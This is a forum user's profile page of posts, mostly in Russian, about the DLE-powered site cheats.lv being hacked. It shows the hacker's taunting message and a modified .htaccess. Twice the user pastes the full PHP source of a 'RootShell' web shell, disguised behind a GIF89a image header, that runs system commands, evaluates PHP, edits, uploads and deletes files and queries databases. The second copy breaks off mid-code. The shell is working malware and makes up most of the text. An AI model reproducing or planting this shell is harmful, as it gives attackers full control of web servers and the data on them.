6748222
-
Публикации
68 -
Зарегистрирован
-
Посещение
-
Дней в лидерах
1
Сообщения, опубликованные пользователем 6748222
-
-
скачал демо версию DLE 9.2 где?
-
Ну я плотил через банк. Думаю завтра начинать переговоры о возврате денег с хостингом
-
обидно оплатил на 3. Года и тут через 2 недели хрень пошла.. реално денги вернуть за хостинг?
-
у меня там 100% ккаято хрень, хостинг говарит что у них нету роот доступа, а я меняю парольи как дурак. Хакер в течение 30.. сек ~ 1. минуты
меняет фаилы.
-
Beru slova obratno
DLE neprichom tolko chto polnostju vsjo udalili u menja s FTP 
-
ну хостер скозал проверал
и нету -
Я удалил ДЛЕ с хостинга и хакер пропал, и некакова роот ацесса у него нету
Уменя всё серёзно
так как мой саит закозали на снос у Арабоф! -
../backup
GIF89aP; <?GIF89aP; error_reporting(0); //If there is an error, we'll show it, k? $password = ""; // You can put a md5 string here too, for plaintext passwords: max 31 chars. $me = basename(__FILE__); $cookiename = "wieeeee"; if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh? { if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5. { $_POST['pass'] = md5($_POST['pass']); } if($_POST['pass'] == $password) { setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in } reload(); } if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password)) { login(); die(); } // //Do not cross this line! All code placed after this block can't be executed without being logged in! // if(isset($_GET['p']) && $_GET['p'] == "logout") { setcookie ($cookiename, "", time() - 3600); reload(); } if(isset($_GET['dir'])) { chdir($_GET['dir']); } $pages = array( 'cmd' => 'Execute Command', 'eval' => 'Evaluate PHP', 'mysql' => 'MySQL Query', 'chmod' => 'Chmod File', 'phpinfo' => 'PHPinfo', 'md5' => 'md5 cracker', 'headers' => 'Show headers', 'logout' => 'Log out' ); //The header, like it? $header = '<html> <title>'.getenv("HTTP_HOST").' ~ Shell I</title> <head> <style> td { font-size: 12px; font-family: verdana; color: #33FF00; background: #000000; } #d { background: #003000; } #f { background: #003300; } #s { background: #006300; } #d:hover { background: #003300; } #f:hover { background: #003000; } pre { font-size: 10px; font-family: verdana; color: #33FF00; } a:hover { text-decoration: none; } input,textarea,select { border-top-width: 1px; font-weight: bold; border-left-width: 1px; font-size: 10px; border-left-color: #33FF00; background: #000000; border-bottom-width: 1px; border-bottom-color: #33FF00; color: #33FF00; border-top-color: #33FF00; font-family: verdana; border-right-width: 1px; border-right-color: #33FF00; } hr { color: #33FF00; background-color: #33FF00; height: 5px; } </style> </head> <body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900"> <table width=100%><td id="header" width=100%> <p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>] [<a href="'.$me.'">Home</a>] '; foreach($pages as $page => $page_name) { $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] '; } $header .= '<br><hr>'.show_dirs('.').'</td><tr><td>'; print $header; $footer = '<tr><td><hr><center>© <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>'; // //Page handling // if(isset($_REQUEST['p'])) { switch ($_REQUEST['p']) { case 'cmd': //Run command print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>"; if(isset($_REQUEST['command'])) { print "<pre>"; execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that? } break; case 'edit': //Edit a fie if(isset($_POST['editform'])) { $f = $_GET['file']; $fh = fopen($f, 'w') or print "Error while opening file!"; fwrite($fh, $_POST['editform']) or print "Couldn't save file!"; fclose($fh); } print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">"; if(file_exists($_GET['file'])) { $rd = file($_GET['file']); foreach($rd as $l) { print htmlspecialchars($l); } } print "</textarea><input type=submit value=\"Save\"></form>"; break; case 'delete': //Delete a file if(isset($_POST['yes'])) { if(unlink($_GET['file'])) { print "File deleted successfully."; } else { print "Couldn't delete file."; } } if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes'])) { print "Are you sure you want to delete ".$_GET['file']."?<br> <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST> <input type=hidden name=yes value=yes> <input type=submit value=\"Delete\"> "; } break; case 'eval': //Evaluate PHP code print "<form action=\"".$me."?p=eval\" method=POST> <textarea cols=60 rows=10 name=\"eval\">"; if(isset($_POST['eval'])) { print htmlspecialchars($_POST['eval']); } else { print "print \"Yo Momma\";"; } print "</textarea><br> <input type=submit value=\"Eval\"> </form>"; if(isset($_POST['eval'])) { print "<h1>Output:</h1>"; print "<br>"; eval($_POST['eval']); } break; case 'chmod': //Chmod file print "<h1>Under construction!</h1>"; if(isset($_POST['chmod'])) { switch ($_POST['chvalue']){ case 777: chmod($_POST['chmod'],0777); break; case 644: chmod($_POST['chmod'],0644); break; case 755: chmod($_POST['chmod'],0755); break; } print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue']."."; } if(isset($_GET['file'])) { $content = urldecode($_GET['file']); } else { $content = "file/path/please"; } print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod: <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b> <select name=\"chvalue\"> <option value=\"777\">777</option> <option value=\"644\">644</option> <option value=\"755\">755</option> </select><input type=submit value=\"Change\">"; break; case 'mysql': //MySQL Query if(isset($_POST['host'])) { $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error()); mysql_select_db($_POST['dbase']); $sql = $_POST['query']; $result = mysql_query($sql); } else { print " This only queries the database, doesn't return data!<br> <form action=\"".$me."?p=mysql\" method=POST> <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br> <b>Username:<br><input type=text name=username value=\"root\" size=10><br> <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br> <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br> <b>Query:<br></b<textarea name=query></textarea> <input type=submit value=\"Query database\"> </form> "; } break; case 'createdir': if(mkdir($_GET['crdir'])) { print 'Directory created successfully.'; } else { print 'Couldn\'t create directory'; } break; case 'phpinfo': //PHP Info phpinfo(); break; case 'rename': if(isset($_POST['fileold'])) { if(rename($_POST['fileold'],$_POST['filenew'])) { print "File renamed."; } else { print "Couldn't rename file."; } } if(isset($_GET['file'])) { $file = basename(htmlspecialchars($_GET['file'])); } else { $file = ""; } print "Renaming ".$file." in folder ".realpath('.').".<br> <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST> <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br> <b>To:<br><input type=text name=filenew value=\"\" size=10><br> <input type=submit value=\"Rename file\"> </form>"; break; case 'md5': if(isset($_POST['md5'])) { if(!is_numeric($_POST['timelimit'])) { $_POST['timelimit'] = 30; } set_time_limit($_POST['timelimit']); if(strlen($_POST['md5']) == 32) { if($_POST['chars'] == "9999") { $i = 0; while($_POST['md5'] != md5($i) && $i != 100000) { $i++; } } else { for($i = "a"; $i != "zzzzz"; $i++) { if(md5($i == $_POST['md5'])) { break; } } } if(md5($i) == $_POST['md5']) { print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>"; } } } print "Will bruteforce the md5 <form action=\"".$me."?p=md5\" method=POST> <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br> <b>Characters:</b><br><select name=\"chars\"> <option value=\"az\">a - zzzzz</option> <option value=\"9999\">1 - 9999999</option> </select> <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br> <input type=submit value=\"Bruteforce md5\"> </form><br>*: if set_time_limit is allowed by php.ini"; break; case 'headers': foreach(getallheaders() as $header => $value) { print htmlspecialchars($header . ":" . $value)."<br>"; } break; } } else //Default page that will be shown when the page isn't found or no page is selected. { $files = array(); $directories = array(); if(isset($_FILES['uploadedfile']['name'])) { $target_path = realpath('.').'/'; $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { print "File:". basename( $_FILES['uploadedfile']['name']). " has been uploaded"; } else{ echo "File upload failed!"; } } print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>"; if ($handle = opendir('.')) { while (false !== ($file = readdir($handle))) { if(is_dir($file)) { $directories[] = $file; } else { $files[] = $file; } } asort($directories); asort($files); foreach($directories as $file) { print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>"; } foreach($files as $file) { print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>"; } } else { print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>"; } print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\"> <input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" /> <input type=\"submit\" value=\"Upload File\" /> </form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td> <tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form> </td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td> </table>"; } function login() { print "<table border=0 width=100% height=100%><td valign=\"middle\"><center> <form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b> <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\"> </form>"; } function reload() { header("Location: ".basename(__FILE__)); } function get_execution_method() { if(function_exists('passthru')){ $m = "passthru"; } if(function_exists('exec')){ $m = "exec"; } if(function_exists('shell_exec')){ $m = "shell_ exec"; } if(function_exists('system')){ $m = "system"; } if(!isset($m)) //No method found :-| { $m = "Disabled"; } return($m); } function execute_command($method,$command) { if($method == "passthru") { passthru($command); } elseif($method == "exec") { exec($command,$result); foreach($result as $output) { print $output."<br>"; } } elseif($method == "shell_exec") { print shell_exec($command); } elseif($method == "system") { system($command); } } function perm($file) { if(file_exists($file)) { return substr(sprintf('%o', fileperms($file)), -4); } else { return "????"; } } function get_color($file) { if(is_writable($file)) { return "green";} if(!is_writable($file) && is_readable($file)) { return "white";} if(!is_writable($file) && !is_readable($file)) { return "red";} } function show_dirs($where) { if(ereg("^c:",realpath($where))) { $dirparts = explode('\\',realpath($where)); } else { $dirparts = explode('/',realpath($where)); } $i = 0; $total = ""; foreach($dirparts as $part) { $p = 0; $pre = ""; while($p != $i) { $pre .= $dirparts[$p]."/"; $p++; } $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/"; $i++; } return "<h2>".$total."</h2><br>"; } print $footer; // Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-) exit(); ?>саит находитса в режиме оффлине с момента покупки хостинга 0_о
PS. когда проверял с дле AntiVirusom скрипт он нечего ненашол
-
купил хостинг на 3 года
Арабы.. бл**
Это вам такое сообщение пришло?от взломшикa
-
у меня с саит (ригинал "чистий") дле 9.2 + рефферал модуль, но саит бил в оффлинe
PS.
www.cheats.lv
-сделать фтп доступ только по маске айпи своего, чтоб кроме вас на него никто не попал
-сделать доступ к файлу админки тоже только по маске своего айпишника, чтобы и туда никто не попал..
а где можно почитать об етом
MeGo EGYPTi0N-H4X0rZ Security said
hohoho u are cheats.lv owner ? =))
know me ? !
http://cheats.lv/ ^^
btw i still have got root server
and ur new server
=))
good luck
^^
типо через хостинг?
-
ето как он мне HTACESS поменял?
<Limit GET POST> order deny,allow deny from all allow from all </Limit> <Limit PUT DELETE> order deny,allow deny from all </Limit> DirectoryIndex index.php RewriteEngine On # Редиректы RewriteRule ^page/(.*)$ index.php?cstart=$1 [L] # Сам пост RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/page,([0-9]+),([0-9]+),(.*).html(/?)+$ index.php?subaction=showfull&year=$1&month=$2&day=$3&news_page=$4&cstart=$5&news_name=$6 [L] RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/page,([0-9]+),(.*).html(/?)+$ index.php?subaction=showfull&year=$1&month=$2&day=$3&news_page=$4&news_name=$5 [L] RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/print:page,([0-9]+),(.*).html(/?)+$ engine/print.php?subaction=showfull&year=$1&month=$2&day=$3&news_page=$4&news_name=$5 [L] RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/(.*).html(/?)+$ index.php?subaction=showfull&year=$1&month=$2&day=$3&news_name=$4 [L] RewriteRule ^([^.]+)/page,([0-9]+),([0-9]+),([0-9]+)-(.*).html(/?)+$ index.php?newsid=$4&news_page=$2&cstart=$3 [L] RewriteRule ^([^.]+)/page,([0-9]+),([0-9]+)-(.*).html(/?)+$ index.php?newsid=$3&news_page=$2 [L] RewriteRule ^([^.]+)/print:page,([0-9]+),([0-9]+)-(.*).html(/?)+$ engine/print.php?news_page=$2&newsid=$3 [L] RewriteRule ^([^.]+)/([0-9]+)-(.*).html(/?)+$ index.php?newsid=$2 [L] RewriteRule ^page,([0-9]+),([0-9]+),([0-9]+)-(.*).html(/?)+$ index.php?newsid=$3&news_page=$1&cstart=$2 [L] RewriteRule ^page,([0-9]+),([0-9]+)-(.*).html(/?)+$ index.php?newsid=$2&news_page=$1 [L] RewriteRule ^print:page,([0-9]+),([0-9]+)-(.*).html(/?)+$ engine/print.php?news_page=$1&newsid=$2 [L] RewriteRule ^([0-9]+)-(.*).html(/?)+$ index.php?newsid=$1 [L] # За день RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})(/?)+$ index.php?year=$1&month=$2&day=$3 [L] RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/page/([0-9]+)(/?)+$ index.php?year=$1&month=$2&day=$3&cstart=$4 [L] # За весь месяц RewriteRule ^([0-9]{4})/([0-9]{2})(/?)+$ index.php?year=$1&month=$2 [L] RewriteRule ^([0-9]{4})/([0-9]{2})/page/([0-9]+)(/?)+$ index.php?year=$1&month=$2&cstart=$3 [L] # Вывод за весь год RewriteRule ^([0-9]{4})(/?)+$ index.php?year=$1 [L] RewriteRule ^([0-9]{4})/page/([0-9]+)(/?)+$ index.php?year=$1&cstart=$2 [L] # вывод отдельному тегу RewriteRule ^tags/([^/]*)(/?)+$ index.php?do=tags&tag=$1 [L] RewriteRule ^tags/([^/]*)/page/([0-9]+)(/?)+$ index.php?do=tags&tag=$1&cstart=$2 [L] # вывод для отдельного юзера RewriteRule ^user/([^/]*)/rss.xml$ engine/rss.php?subaction=allnews&user=$1 [L] RewriteRule ^user/([^/]*)(/?)+$ index.php?subaction=userinfo&user=$1 [L] RewriteRule ^user/([^/]*)/page/([0-9]+)(/?)+$ index.php?subaction=userinfo&user=$1&cstart=$2 [L] RewriteRule ^user/([^/]*)/news(/?)+$ index.php?subaction=allnews&user=$1 [L] RewriteRule ^user/([^/]*)/news/page/([0-9]+)(/?)+$ index.php?subaction=allnews&user=$1&cstart=$2 [L] RewriteRule ^user/([^/]*)/news/rss.xml(/?)+$ engine/rss.php?subaction=allnews&user=$1 [L] # вывод всех последних новостей RewriteRule ^lastnews/(/?)+$ index.php?do=lastnews [L] RewriteRule ^lastnews/page/([0-9]+)(/?)+$ index.php?do=lastnews&cstart=$1 [L] # вывод в виде каталога RewriteRule ^catalog/([^/]*)/rss.xml$ engine/rss.php?catalog=$1 [L] RewriteRule ^catalog/([^/]*)(/?)+$ index.php?catalog=$1 [L] RewriteRule ^catalog/([^/]*)/page/([0-9]+)(/?)+$ index.php?catalog=$1&cstart=$2 [L] # вывод непрочитанных статей RewriteRule ^newposts(/?)+$ index.php?subaction=newposts [L] RewriteRule ^newposts/page/([0-9]+)(/?)+$ index.php?subaction=newposts&cstart=$1 [L] # Статистические страницы RewriteRule ^static/(.*).html(/?)+$ index.php?do=static&page=$1 [L] # вывод избранных статей RewriteRule ^favorites(/?)+$ index.php?do=favorites [L] RewriteRule ^favorites/page/([0-9]+)(/?)+$ index.php?do=favorites&cstart=$1 [L] RewriteRule ^rules.html$ index.php?do=rules [L] RewriteRule ^statistics.html$ index.php?do=stats [L] RewriteRule ^addnews.html$ index.php?do=addnews [L] RewriteRule ^rss.xml$ engine/rss.php [L] RewriteRule ^sitemap.xml$ uploads/sitemap.xml [L] RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^([^.]+)/page/([0-9]+)(/?)+$ index.php?do=cat&category=$1&cstart=$2 [L] RewriteRule ^([^.]+)/?$ index.php?do=cat&category=$1 [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteRule ^([^.]+)/rss.xml$ engine/rss.php?do=cat&category=$1 [L] RewriteRule ^page,([0-9]+),([^/]+).html$ index.php?do=static&page=$2&news_page=$1 [L] RewriteRule ^print:([^/]+).html$ engine/print.php?do=static&page=$1 [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteRule ^([^/]+).html$ index.php?do=static&page=$1 [L] AuthName cheats.lv IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*саит был в оффлине режиме
-
fopen(/storage/home/srv31619/htdocs/site.ru/backup/***_2011-03-29_08-08_2950e.sql): failed to open stream: Permission denied (2)
NULLED?
-
если я у Вас уже конфиг стяну?
И что вы сделаете с конфигом, если нет админки? Ок, стянете dbconf.php, найдете каким-то образом phpmyadmin, сделаете себя админом, и что дальше?
бред..
автор сам не понимает о чем говорит!зачем мне админка, если есть у меня аккаунт и пароль
-
Нужен человек который знаком с DLE звижком
- почистить шаблон, исправить ошибки
- нормално адаптировать под 9.2 версию
шаблон (YOOtheme - Chrome) :
http://webcache.googleusercontent.com/search?q=cache:NzyB8yPBrt8J:www.cheats.lv/285-cheatslv-hacked.html+cheats.lv&cd=3&hl=lv&ct=clnk&gl=lv&source=www.google.lv
оплата: через систему PayPal
icq: нету, пишем в PM
-
http://dle-news.ru/modules/1090-modul-ot-smscoin-popolnenie-balansa-vip-gruppa-skrytie-kontenta.html
-
1
-
-
1. Если ваша тема начинается с вопроса и вам нужна какая либо помощь, то в самой теме в обязательном порядке вы должны указывать ссылку на ваш сайт.
Уважаем чужой труд
-
когда покупал лицензию я писал в суппорт, скозали что нелзя! - в итоге ДЛЕ(59$) мне обошлас в 100$ +
-
когда, еслы будет такая возможность оплатит срипт через систему PayPal?
-
В том что MAC привязывается у провайдера и сменив его можно тупо не выйти в инет.
зависит от проваидера, но эсли и так то можно позвонит и поменать
-
в папке Uploads/fotos ишо такое хрень
молодой чемодан скозал обнаружил етот баг с "Image shell" ишо месец назад.. я чегото пропустил или ета DLE баг?
-
только етот: ./engine/classes/geoip/geoipregionvars.php
я вручную удалил 4 ~ 5 php фаили
-
xакнули саит - www.cheats.lv DLE 9.0
я вопше в пхп нема етц..
но походу шелломGIF89aP; <?GIF89aP; error_reporting(0); //If there is an error, we'll show it, k? $password = ""; // You can put a md5 string here too, for plaintext passwords: max 31 chars. $me = basename(__FILE__); $cookiename = "wieeeee"; if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh? { if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5. { $_POST['pass'] = md5($_POST['pass']); } if($_POST['pass'] == $password) { setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in } reload(); } if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password)) { login(); die(); } // //Do not cross this line! All code placed after this block can't be executed without being logged in! // if(isset($_GET['p']) && $_GET['p'] == "logout") { setcookie ($cookiename, "", time() - 3600); reload(); } if(isset($_GET['dir'])) { chdir($_GET['dir']); } $pages = array( 'cmd' => 'Execute Command', 'eval' => 'Evaluate PHP', 'mysql' => 'MySQL Query', 'chmod' => 'Chmod File', 'phpinfo' => 'PHPinfo', 'md5' => 'md5 cracker', 'headers' => 'Show headers', 'logout' => 'Log out' ); //The header, like it? $header = '<html> <title>'.getenv("HTTP_HOST").' ~ Shell I</title> <head> <style> td { font-size: 12px; font-family: verdana; color: #33FF00; background: #000000; } #d { background: #003000; } #f { background: #003300; } #s { background: #006300; } #d:hover { background: #003300; } #f:hover { background: #003000; } pre { font-size: 10px; font-family: verdana; color: #33FF00; } a:hover { text-decoration: none; } input,textarea,select { border-top-width: 1px; font-weight: bold; border-left-width: 1px; font-size: 10px; border-left-color: #33FF00; background: #000000; border-bottom-width: 1px; border-bottom-color: #33FF00; color: #33FF00; border-top-color: #33FF00; font-family: verdana; border-right-width: 1px; border-right-color: #33FF00; } hr { color: #33FF00; background-color: #33FF00; height: 5px; } </style> </head> <body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900"> <table width=100%><td id="header" width=100%> <p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>] [<a href="'.$me.'">Home</a>] '; foreach($pages as $page => $page_name) { $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] '; } $header .= '<br><hr>'.show_dirs('.').'</td><tr><td>'; print $header; $footer = '<tr><td><hr><center>© <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>'; // //Page handling // if(isset($_REQUEST['p'])) { switch ($_REQUEST['p']) { case 'cmd': //Run command print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>"; if(isset($_REQUEST['command'])) { print "<pre>"; execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that? } break; case 'edit': //Edit a fie if(isset($_POST['editform'])) { $f = $_GET['file']; $fh = fopen($f, 'w') or print "Error while opening file!"; fwrite($fh, $_POST['editform']) or print "Couldn't save file!"; fclose($fh); } print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">"; if(file_exists($_GET['file'])) { $rd = file($_GET['file']); foreach($rd as $l) { print htmlspecialchars($l); } } print "</textarea><input type=submit value=\"Save\"></form>"; break; case 'delete': //Delete a file if(isset($_POST['yes'])) { if(unlink($_GET['file'])) { print "File deleted successfully."; } else { print "Couldn't delete file."; } } if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes'])) { print "Are you sure you want to delete ".$_GET['file']."?<br> <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST> <input type=hidden name=yes value=yes> <input type=submit value=\"Delete\"> "; } break; case 'eval': //Evaluate PHP code print "<form action=\"".$me."?p=eval\" method=POST> <textarea cols=60 rows=10 name=\"eval\">"; if(isset($_POST['eval'])) { print htmlspecialchars($_POST['eval']); } else { print "print \"Yo Momma\";"; } print "</textarea><br> <input type=submit value=\"Eval\"> </form>"; if(isset($_POST['eval'])) { print "<h1>Output:</h1>"; print "<br>"; eval($_POST['eval']); } break; case 'chmod': //Chmod file print "<h1>Under construction!</h1>"; if(isset($_POST['chmod'])) { switch ($_POST['chvalue']){ case 777: chmod($_POST['chmod'],0777); break; case 644: chmod($_POST['chmod'],0644); break; case 755: chmod($_POST['chmod'],0755); break; } print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue']."."; } if(isset($_GET['file'])) { $content = urldecode($_GET['file']); } else { $content = "file/path/please"; } print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod: <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b> <select name=\"chvalue\"> <option value=\"777\">777</option> <option value=\"644\">644</option> <option value=\"755\">755</option> </select><input type=submit value=\"Change\">"; break; case 'mysql': //MySQL Query if(isset($_POST['host'])) { $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error()); mysql_select_db($_POST['dbase']); $sql = $_POST['query']; $result = mysql_query($sql); } else { print " This only queries the database, doesn't return data!<br> <form action=\"".$me."?p=mysql\" method=POST> <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br> <b>Username:<br><input type=text name=username value=\"root\" size=10><br> <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br> <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br> <b>Query:<br></b<textarea name=query></textarea> <input type=submit value=\"Query database\"> </form> "; } break; case 'createdir': if(mkdir($_GET['crdir'])) { print 'Directory created successfully.'; } else { print 'Couldn\'t create directory'; } break; case 'phpinfo': //PHP Info phpinfo(); break; case 'rename': if(isset($_POST['fileold'])) { if(rename($_POST['fileold'],$_POST['filenew'])) { print "File renamed."; } else { print "Couldn't rename file."; } } if(isset($_GET['file'])) { $file = basename(htmlspecialchars($_GET['file'])); } else { $file = ""; } print "Renaming ".$file." in folder ".realpath('.').".<br> <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST> <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br> <b>To:<br><input type=text name=filenew value=\"\" size=10><br> <input type=submit value=\"Rename file\"> </form>"; break; case 'md5': if(isset($_POST['md5'])) { if(!is_numeric($_POST['timelimit'])) { $_POST['timelimit'] = 30; } set_time_limit($_POST['timelimit']); if(strlen($_POST['md5']) == 32) { if($_POST['chars'] == "9999") { $i = 0; while($_POST['md5'] != md5($i) && $i != 100000) { $i++; } } else { for($i = "a"; $i != "zzzzz"; $i++) { if(md5($i == $_POST['md5'])) { break; } } } if(md5($i) == $_POST['md5']) { print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>"; } } } print "Will bruteforce the md5 <form action=\"".$me."?p=md5\" method=POST> <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br> <b>Characters:</b><br><select name=\"chars\"> <option value=\"az\">a - zzzzz</option> <option value=\"9999\">1 - 9999999</option> </select> <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br> <input type=submit value=\"Bruteforce md5\"> </form><br>*: if set_time_limit is allowed by php.ini"; break; case 'headers': foreach(getallheaders() as $header => $value) { print htmlspecialchars($header . ":" . $value)."<br>"; } break; } } else //Default page that will be shown when the page isn't found or no page is selected. { $files = array(); $directories = array(); if(isset($_FILES['uploadedfile']['name'])) { $target_path = realpath('.').'/'; $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { print "File:". basename( $_FILES['uploadedfile']['name']). " has been uploaded"; } else{ echo "File upload failed!"; } } print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>"; if ($handle = opendir('.')) { while (false !== ($file = readdir($handle))) { if(is_dir($file)) { $directories[] = $file; } else { $files[] = $file; } } asort($directories); asort($files); foreach($directories as $file) { print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>"; } foreach($files as $file) { print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>"; } } else { print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>"; } print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\"> <input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" /> <input type=\"submit\" value=\"Upload File\" /> </form></td><td><form action=\"".$me."\" 